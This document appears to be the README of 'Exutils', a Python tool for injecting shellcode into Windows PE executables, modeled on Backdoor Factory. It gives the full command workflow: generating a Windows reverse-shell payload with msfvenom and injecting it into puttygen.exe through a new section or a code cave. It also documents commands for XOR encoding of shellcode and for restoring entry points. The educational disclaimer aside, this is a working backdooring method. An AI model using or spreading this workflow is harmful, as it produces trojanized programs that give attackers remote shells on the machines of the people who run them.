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Small collection of utilities to analyzie and manipulate executables


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Exutils: A Small Collection of Python Scripts for Binary Analysis and Manipulation


This project is meant to be used for educational purposes only or for authorized purposes.

This project is a work in progress. Not all features are integrated but now the following use cases are supported.

  • Adding a new section and entering at that new section without restoration
  • Adding a new section, jumping to that section, and restoring the original instructions

The goal is to leverage pefile and capstone to create a stripped down version of the Backdoor factory targeting 32 and 64 bit x86 systems that is easy to develop with.


  • Use an xor/encoder stub
  • Discover code cave in .text and write to there
  • Cleanup: add mixin inheritance for common functionality in inject module
  • Cleanup: move restoration to class(es)


$ msfvenom -p windows/shell_reverse_tcp -o /path/to/payload/ LHOST=x LPORT=y -f python
## edit the file and remove all the "python" portions so that it is just in /x00/x01/x02... format, new lines will be removed automatically
## save new verseion as local.txt
$ ./ build -s txt:/path/to/payload/local.txt -f samples/puttygen-x86.exe --force --cave new-section -o /path/to/payloads/folder


usage: [-h] {binasm,bincave,boofuzz,build,expand,new-section,peinfo,shellasm,shellxor} ...

Inject shellcode into new section

positional arguments:
    binasm              get asm from shellcode
    bincave             find code caves
    boofuzz             boofuzz (highly experimental, typically needs to be customized)
    build               build injected binary
    expand              expand binary (creates a copy)
    new-section         add a new section (copies and expands source file)
    peinfo              get info about pefile
    shellasm            get asm from shellcode
    shellxor            bitwise xor on shellcode

optional arguments:
  -h, --help            show this help message and exit


Inject shellcode into a binary by creating a new section and changing the entrypoint via pefile. Attempts can be made to 'fix' the executable so that it restores the registers.

usage: build [-h] -s SHELLCODE -f FILE [-o OUTPUT] [-F] [--no-restore] [--nop-restore-data] [-c {auto,cave,new-section}] [-e {jump,new-section}]

optional arguments:
  -h, --help            show this help message and exit
  -s SHELLCODE, --shellcode SHELLCODE
                        shellcode to convert in \xAA\xBB format (can also pass: a python import path via 'py:somefile.someimporttarget', shellcode in \AA format in a file via 'txt:/path/to/file', and binary data in a file via
  -f FILE, --file FILE  path to source pe file
  -o OUTPUT, --output OUTPUT
                        path to newly created pe file
  -F, --force           force overwrite output
  --no-restore          do not fix the payload with popa and pusha
  --nop-restore-data    fill replaced/removed original instructions with NOPs instead of appending them to shellcode
  -c {auto,cave,new-section}, --cave {auto,cave,new-section}
                        where to write the shellcode. defaults to auto
  -e {jump,new-section}, --enter {jump,new-section}
                        how to handle the entrypoing. defaults to 'jump' where the executable uses 'jmp' to move to new section

Shoulders of Giants:


Small collection of utilities to analyzie and manipulate executables







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